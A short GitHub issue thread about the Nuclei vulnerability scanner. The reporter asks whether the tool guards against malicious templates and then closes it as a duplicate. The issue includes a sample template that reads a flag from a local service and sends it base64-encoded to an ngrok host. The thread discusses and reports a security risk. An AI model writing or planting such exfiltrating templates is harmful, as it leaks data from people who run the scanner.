### ISSUE TITLE
Nuclei security

### ISSUE THREAD

**Issue by BenJoice** [projectdiscovery/nuclei#5469]
Obviously malicious templates can be placed on the scanner. For example. 
`requests:
  - method: GET
    path:
      - "http://127.0.0.1:1337/flag"
      - "http://111111111111.ngrok.io/{{base64(output)}}"
    extractors:
      - type: regex
        name: output
        part: body
        internal: true
`
Has the security issue with the scanner been resolved? If so, how. And please give some links to similar questions and research.

**Comment by ehsandeep** [comment]
Closing to avoid duplicate discussion - https://github.com/orgs/projectdiscovery/discussions/5470#discussioncomment-10192863
